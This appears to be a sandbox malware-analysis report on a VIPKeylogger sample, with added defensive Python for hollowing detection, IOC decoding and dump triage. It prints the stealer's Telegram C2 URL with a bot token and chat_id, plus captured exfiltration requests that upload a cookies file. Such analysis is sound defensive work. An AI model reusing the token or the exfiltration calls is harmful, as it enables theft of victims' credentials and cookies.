Resubmissions

10/10/2024, 02:19 UTC: 241010-crx4sazhnm (score 10/10)

Analysis

  • max time kernel
    104s
  • max time network
    137s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win11-20241007-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    10/10/2024, 02:19 UTC

General

  • Target

    Samples - 10-09-2024/45aae4515b7076d25923730c3672cb9e8f462cf402828fd3eb2d3255d626df56.exe

  • Size

    1.0MB

  • MD5

    d96552352f1a07f3a15a7edeac9158fa

  • SHA1

    874467ad9048f02dfcebc2415391f93854dfeeb6

  • SHA256

    45aae4515b7076d25923730c3672cb9e8f462cf402828fd3eb2d3255d626df56

  • SHA512

    eac4080aa9eac27327abecff4c1c2a6c92d1a573a3df1bdc10d2f6f3c39e96705911ec8c02245cb50bc59da5bb549025d7577bb10a66b2717f390b17d394c3fc

  • SSDEEP

    24576:54lavt0LkLL9IMixoEgeaP6npT4Tl7zo7RG9kq9MmCS:Ikwkn9IMHeaPe5+7zARDaPCS

Malware Config

Extracted

Family

vipkeylogger

C2

https://api.telegram.org/bot7045535067:AAFB6Qd5XE98Vho9iunrlrUC41JAx3FhGjY/sendMessage?chat_id=5916042829

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and information stealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the victim system's language in order to infer the host's geographical location.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Samples - 10-09-2024\45aae4515b7076d25923730c3672cb9e8f462cf402828fd3eb2d3255d626df56.exe
    "C:\Users\Admin\AppData\Local\Temp\Samples - 10-09-2024\45aae4515b7076d25923730c3672cb9e8f462cf402828fd3eb2d3255d626df56.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5352
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\AppData\Local\Temp\Samples - 10-09-2024\45aae4515b7076d25923730c3672cb9e8f462cf402828fd3eb2d3255d626df56.exe"
      2⤵
      • Accesses Microsoft Outlook profiles
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:3896
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 824
      2⤵
      • Program crash
      PID:2472
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 5352 -ip 5352
    1⤵
      PID:2236
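
The tree above is the classic hollowing shape: the dropper (PID 5352, flagged for SetThreadContext, WriteProcessMemory and MapViewOfSection) spawns the .NET host RegSvcs.exe (PID 3896), but the child's command line still names the dropper, and the Outlook and browser access happens from the RegSvcs.exe process. The following is an added example, not code from tria.ge or from the malware, showing how to flag that shape from ordinary process-creation telemetry. The events are constructed to mirror the report (field names follow Sysmon Event ID 1); the dropper's parent, its parent PID and the benign MSBuild control event are assumptions.

```python
"""Added example (not part of the tria.ge report): flag the process-hollowing
pattern seen in the process tree from Sysmon-style process-creation events."""
import ntpath

# .NET framework utilities that stealers commonly hollow; RegSvcs.exe is the one used here.
DOTNET_HOSTS = {
    "regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe",
    "aspnet_compiler.exe", "applaunch.exe", "csc.exe", "vbc.exe",
}
# Lower-case directory fragments that mark a user-writable drop location.
USER_WRITABLE = ("\\appdata\\", "\\downloads\\", "\\users\\public\\", "\\programdata\\")

# Constructed events modelled on the report's process tree. The explorer.exe parent,
# the PIDs 4100/6000/7012 and the MSBuild control event are assumptions.
SAMPLE_DIR = r"C:\Users\Admin\AppData\Local\Temp\Samples - 10-09-2024"
SAMPLE_EXE = SAMPLE_DIR + r"\45aae4515b7076d25923730c3672cb9e8f462cf402828fd3eb2d3255d626df56.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 5352, "Image": SAMPLE_EXE, "CommandLine": f'"{SAMPLE_EXE}"',
     "ParentProcessId": 4100, "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 3896, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": f'"{SAMPLE_EXE}"', "ParentProcessId": 5352, "ParentImage": SAMPLE_EXE},
    {"ProcessId": 2472, "Image": r"C:\Windows\SysWOW64\WerFault.exe",
     "CommandLine": r"C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 824",
     "ParentProcessId": 5352, "ParentImage": SAMPLE_EXE},
    # Benign control: a build tool launching MSBuild.exe with its own path on the command line.
    {"ProcessId": 7012, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" app.csproj',
     "ParentProcessId": 6000, "ParentImage": r"C:\Program Files\dotnet\dotnet.exe"},
]


def command_line_image(cmdline: str) -> str:
    """Return the executable path named at the start of a Windows command line."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:] if end == -1 else s[1:end]
    return s.split(" ", 1)[0]


def reasons(event: dict) -> list:
    """Collect the hollowing indicators present in one process-creation event."""
    found = []
    actual = ntpath.basename(event["Image"]).lower()
    claimed = ntpath.basename(command_line_image(event["CommandLine"])).lower()
    if actual in DOTNET_HOSTS:
        found.append("dotnet-host")
    # The tell from this report: RegSvcs.exe runs, but the command line names the dropper.
    if claimed and claimed != actual:
        found.append("cmdline-image-mismatch")
    if any(frag in event.get("ParentImage", "").lower() for frag in USER_WRITABLE):
        found.append("parent-in-user-writable-dir")
    return found


def is_hollowing_candidate(event: dict) -> bool:
    """Alert only on the combination; either indicator on its own is noisy."""
    found = reasons(event)
    return "dotnet-host" in found and "cmdline-image-mismatch" in found


def scan(events=SAMPLE_EVENTS) -> list:
    """Return (pid, image name, reasons) for every event that matches."""
    return [(e["ProcessId"], ntpath.basename(e["Image"]), reasons(e))
            for e in events if is_hollowing_candidate(e)]


if __name__ == "__main__":
    for pid, image, why in scan():
        print(f"PID {pid} {image}: {', '.join(why)}")
```

The image/command-line mismatch alone produces false positives, because CreateProcess lets a caller pass an application name that differs from the command line it hands the child, so the check is gated on the child being one of the .NET hosts; the user-writable-parent indicator is reported for context rather than required. Running the scan on the constructed events returns only PID 3896.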

    Network

    • flag-us
      DNS
      checkip.dyndns.org
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      checkip.dyndns.org
      IN A
      Response
      checkip.dyndns.org
      IN CNAME
      checkip.dyndns.com
      checkip.dyndns.com
      IN A
      158.101.44.242
      checkip.dyndns.com
      IN A
      193.122.6.168
      checkip.dyndns.com
      IN A
      193.122.130.0
      checkip.dyndns.com
      IN A
      132.226.8.169
      checkip.dyndns.com
      IN A
      132.226.247.73
    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dns.google
    • flag-us
      DNS
      reallyfreegeoip.org
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      reallyfreegeoip.org
      IN A
      Response
      reallyfreegeoip.org
      IN A
      104.21.67.152
      reallyfreegeoip.org
      IN A
      172.67.177.134
    • flag-us
      DNS
      242.44.101.158.in-addr.arpa
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      242.44.101.158.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      152.67.21.104.in-addr.arpa
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      152.67.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      api.telegram.org
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
      Response
      api.telegram.org
      IN A
      149.154.167.220
    • flag-us
      DNS
      220.167.154.149.in-addr.arpa
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      220.167.154.149.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      nexusrules.officeapps.live.com
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      nexusrules.officeapps.live.com
      IN A
      Response
      nexusrules.officeapps.live.com
      IN CNAME
      prod.nexusrules.live.com.akadns.net
      prod.nexusrules.live.com.akadns.net
      IN A
      52.111.243.29
    • flag-us
      DNS
      29.243.111.52.in-addr.arpa
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      29.243.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:08 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: 2be46430163eaa2ec46e402c6f4134e8
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:08 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: 3d3fe80d2bc780ca99c6091e9ba27805
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:09 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: e585546f3f27b4e4d2c642b50ade23ba
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:09 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: 041eb62e5b214f8df3981bc6440afa86
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:09 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: 618067b1881670aa1411710e06b83f6c
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:09 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: ae2124d1753c5468dd24a1d0e3e5f227
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:10 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: a663d07424aefb9adfb0fcdc234f6e9f
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:10 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: b62a37eab0353041ba3cea8d22fa27fb
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:10 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: f1591218eefc9149cecb8fee37d81d84
    • flag-us
      GET
      http://checkip.dyndns.org/
      RegSvcs.exe
      Remote address:
      158.101.44.242:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 02:28:10 GMT
      Content-Type: text/html
      Content-Length: 105
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
      X-Request-ID: 1b3f811ffa1043e14b3c9ae880ed74c7
    • flag-nl
      GET
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:FEBLIQTI%0D%0ADate%20and%20Time:%2010/10/2024%20/%202:27:56%20AM%0D%0ACountry%20Name:%20%0D%0A%5B%20FEBLIQTI%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
      RegSvcs.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:FEBLIQTI%0D%0ADate%20and%20Time:%2010/10/2024%20/%202:27:56%20AM%0D%0ACountry%20Name:%20%0D%0A%5B%20FEBLIQTI%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
      Host: api.telegram.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Server: nginx/1.18.0
      Date: Thu, 10 Oct 2024 02:28:11 GMT
      Content-Type: application/json
      Content-Length: 55
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      POST
      https://api.telegram.org/bot7045535067:AAFB6Qd5XE98Vho9iunrlrUC41JAx3FhGjY/sendDocument?chat_id=5916042829&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery
      RegSvcs.exe
      Remote address:
      149.154.167.220:443
      Request
      POST /bot7045535067:AAFB6Qd5XE98Vho9iunrlrUC41JAx3FhGjY/sendDocument?chat_id=5916042829&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery HTTP/1.1
      Content-Type: multipart/form-data; boundary=------------------------8dce8d32a2ae3e2
      Host: api.telegram.org
      Content-Length: 930
      Response
      HTTP/1.1 401 Unauthorized
      Server: nginx/1.18.0
      Date: Thu, 10 Oct 2024 02:28:18 GMT
      Content-Type: application/json
      Content-Length: 58
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • 158.101.44.242:80
      http://checkip.dyndns.org/
      http
      RegSvcs.exe
      2.3kB
      3.8kB
      23
      14

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200
    • 104.21.67.152:443
      reallyfreegeoip.org
      tls
      RegSvcs.exe
      2.2kB
      14.0kB
      25
      25
    • 149.154.167.220:443
      https://api.telegram.org/bot7045535067:AAFB6Qd5XE98Vho9iunrlrUC41JAx3FhGjY/sendDocument?chat_id=5916042829&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery
      tls, http
      RegSvcs.exe
      2.6kB
      7.2kB
      14
      14

      HTTP Request

      GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:FEBLIQTI%0D%0ADate%20and%20Time:%2010/10/2024%20/%202:27:56%20AM%0D%0ACountry%20Name:%20%0D%0A%5B%20FEBLIQTI%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

      HTTP Response

      404

      HTTP Request

      POST https://api.telegram.org/bot7045535067:AAFB6Qd5XE98Vho9iunrlrUC41JAx3FhGjY/sendDocument?chat_id=5916042829&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery

      HTTP Response

      401
    • 8.8.8.8:53
      checkip.dyndns.org
      dns
      RegSvcs.exe
      624 B
      1.2kB
      9
      9

      DNS Request

      checkip.dyndns.org

      DNS Response

      158.101.44.242
      193.122.6.168
      193.122.130.0
      132.226.8.169
      132.226.247.73

      DNS Request

      8.8.8.8.in-addr.arpa

      DNS Request

      reallyfreegeoip.org

      DNS Response

      104.21.67.152
      172.67.177.134

      DNS Request

      242.44.101.158.in-addr.arpa

      DNS Request

      152.67.21.104.in-addr.arpa

      DNS Request

      api.telegram.org

      DNS Response

      149.154.167.220

      DNS Request

      220.167.154.149.in-addr.arpa

      DNS Request

      nexusrules.officeapps.live.com

      DNS Response

      52.111.243.29

      DNS Request

      29.243.111.52.in-addr.arpa
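
The two api.telegram.org calls above are the exfiltration channel: a sendMessage beacon sent with an empty bot token and chat_id (Telegram answered 404), then a sendDocument upload of the "Cookies" recovery file using the token and chat_id from the Malware Config section (Telegram answered 401, so the token was not accepted at analysis time). The following is an added example, not code from tria.ge or from the malware, that parses those captured request lines and the C2 URL, percent-decodes the exfiltrated text, splits it into fields, and masks the bot secret so the indicator can be shared. The request lines and status codes are copied from this report; the masking format is an assumption of the example.

```python
"""Added example (not part of the tria.ge report): decode the Telegram Bot API
calls captured in the Network section and pull out the IOCs an analyst needs."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed from the two api.telegram.org request lines and response codes in the report.
CAPTURED_REQUESTS = [
    ("GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:FEBLIQTI%0D%0ADate"
     "%20and%20Time:%2010/10/2024%20/%202:27:56%20AM%0D%0ACountry%20Name:%20%0D%0A%5B"
     "%20FEBLIQTI%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's"
     "%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1", 404),
    ("POST /bot7045535067:AAFB6Qd5XE98Vho9iunrlrUC41JAx3FhGjY/sendDocument?chat_id="
     "5916042829&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A"
     "%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery HTTP/1.1", 401),
]

# Bot API paths look like /bot<bot_id>:<secret>/<method>; the token may be absent.
BOT_PATH = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)$")


def parse_bot_api_target(target: str) -> dict:
    """Parse a Bot API URL or request-target into method, token, chat_id and payload.

    Accepts the full C2 URL from the Malware Config as well as the bare path of a
    request line, since urlsplit handles both.
    """
    parts = urlsplit(target)
    m = BOT_PATH.match(parts.path)
    if not m:
        raise ValueError(f"not a Telegram Bot API call: {target!r}")
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes the values
    token = m.group("token")
    return {
        "method": m.group("method"),
        "token": token,
        "bot_id": token.split(":", 1)[0],        # numeric user id of the bot
        "chat_id": qs.get("chat_id", [""])[0],   # destination chat/account
        "payload": (qs.get("text") or qs.get("caption") or [""])[0],
    }


def parse_request_line(line: str) -> dict:
    """Split 'VERB target HTTP/x.y' and parse the target."""
    verb, target, _version = line.split(" ", 2)
    info = parse_bot_api_target(target)
    info["verb"] = verb
    return info


def payload_fields(payload: str) -> dict:
    """Turn the 'Key: value' lines of the exfiltrated text into a dict."""
    fields = {}
    for line in payload.splitlines():
        line = line.strip()
        if ":" in line and not line.startswith("["):
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def mask_token(token: str) -> str:
    """Keep the bot id and a 4-char prefix so the IOC can be shared without being usable."""
    if ":" not in token:
        return token
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


def triage(requests=CAPTURED_REQUESTS) -> list:
    """Summarise each captured call: destination, decoded content, and Telegram's answer."""
    rows = []
    for line, status in requests:
        info = parse_request_line(line)
        rows.append({
            "verb": info["verb"],
            "method": info["method"],
            "bot_id": info["bot_id"],
            "token": mask_token(info["token"]),
            "chat_id": info["chat_id"],
            "fields": payload_fields(info["payload"]),
            "status": status,
            "accepted": 200 <= status < 300,
        })
    return rows


if __name__ == "__main__":
    for row in triage():
        print(row)
```

The bot id (the digits before the colon) and the chat_id are the stable indicators to record; the secret half of the token is what grants access to the bot, so share it masked or report it to Telegram rather than pasting it into tickets. Neither call was accepted, which is why the sandbox saw no successful upload.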

    MITRE ATT&CK Enterprise v15

    Downloads

    • memory/3896-12-0x0000000006830000-0x00000000069F2000-memory.dmp

      Filesize

      1.8MB

    • memory/3896-7-0x0000000000400000-0x000000000044A000-memory.dmp

      Filesize

      296KB

    • memory/3896-8-0x000000007334E000-0x000000007334F000-memory.dmp

      Filesize

      4KB

    • memory/3896-9-0x0000000005BB0000-0x0000000006156000-memory.dmp

      Filesize

      5.6MB

    • memory/3896-10-0x00000000054D0000-0x000000000556C000-memory.dmp

      Filesize

      624KB

    • memory/3896-11-0x0000000073340000-0x0000000073AF1000-memory.dmp

      Filesize

      7.7MB

    • memory/3896-13-0x00000000066D0000-0x0000000006720000-memory.dmp

      Filesize

      320KB

    • memory/3896-14-0x0000000006F30000-0x000000000745C000-memory.dmp

      Filesize

      5.2MB

    • memory/3896-15-0x000000007334E000-0x000000007334F000-memory.dmp

      Filesize

      4KB

    • memory/3896-16-0x0000000073340000-0x0000000073AF1000-memory.dmp

      Filesize

      7.7MB

    • memory/3896-17-0x0000000006AA0000-0x0000000006B32000-memory.dmp

      Filesize

      584KB

    • memory/3896-18-0x0000000006A00000-0x0000000006A0A000-memory.dmp

      Filesize

      40KB

    • memory/5352-6-0x0000000001330000-0x0000000001730000-memory.dmp

      Filesize

      4.0MB
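
All but one of the dumps above come from PID 3896, the hollowed RegSvcs.exe; the 296KB region at 0x00400000 (the default image base of a 32-bit PE) is the natural first candidate for the unpacked C# payload. The following is an added example, not code from tria.ge, that parses the dump names, recomputes each region's size to cross-check the listed Filesize, selects the regions sitting at that image base, and runs a minimal PE header check on a carved region. The dump list is constructed from the names on this page; the "region at 0x400000" rule is a heuristic, not a guarantee.

```python
"""Added example (not part of the tria.ge report): parse memory-dump names from the
Downloads section, verify their sizes, and pick the region to carve first."""
import re
import struct

# Constructed from the dump names and listed sizes in the report.
DUMPS = [
    ("memory/3896-12-0x0000000006830000-0x00000000069F2000-memory.dmp", "1.8MB"),
    ("memory/3896-7-0x0000000000400000-0x000000000044A000-memory.dmp", "296KB"),
    ("memory/3896-8-0x000000007334E000-0x000000007334F000-memory.dmp", "4KB"),
    ("memory/3896-9-0x0000000005BB0000-0x0000000006156000-memory.dmp", "5.6MB"),
    ("memory/3896-10-0x00000000054D0000-0x000000000556C000-memory.dmp", "624KB"),
    ("memory/3896-11-0x0000000073340000-0x0000000073AF1000-memory.dmp", "7.7MB"),
    ("memory/5352-6-0x0000000001330000-0x0000000001730000-memory.dmp", "4.0MB"),
]

DUMP_NAME = re.compile(
    r"memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
# Default image base of a 32-bit PE; a hollowed payload is usually mapped here.
DEFAULT_IMAGE_BASE_32 = 0x00400000


def parse_dump_name(name: str) -> dict:
    """Split '<pid>-<index>-<start>-<end>' out of a tria.ge dump file name."""
    m = DUMP_NAME.search(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    return {"pid": int(m["pid"]), "index": int(m["idx"]),
            "start": start, "end": end, "size": end - start}


def human_size(n: int) -> str:
    """Match the report's rounding: whole KB below 1 MiB, one decimal of MB above."""
    if n < 1024 * 1024:
        return f"{n / 1024:.0f}KB"
    return f"{n / (1024 * 1024):.1f}MB"


def size_mismatches(dumps=DUMPS) -> list:
    """Names whose computed size disagrees with the listed Filesize."""
    return [name for name, listed in dumps
            if human_size(parse_dump_name(name)["size"]) != listed]


def carve_candidates(dumps=DUMPS) -> list:
    """Regions at the 32-bit default image base: (pid, name, size in bytes)."""
    out = []
    for name, _listed in dumps:
        d = parse_dump_name(name)
        if d["start"] == DEFAULT_IMAGE_BASE_32:
            out.append((d["pid"], name, d["size"]))
    return out


def looks_like_pe(data: bytes) -> bool:
    """Cheap header check to run on a carved region before decompiling it."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


if __name__ == "__main__":
    for pid, name, size in carve_candidates():
        print(f"PID {pid}: {name} ({human_size(size)})")
    print("size mismatches:", size_mismatches())
```

For this report the candidate is the PID 3896 region 0x400000-0x44A000 (303104 bytes, 296KB). A dump that passes looks_like_pe is still only a starting point: the region was captured from a live process, so sections are at their virtual rather than file offsets and may need to be realigned before a .NET decompiler will load it.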
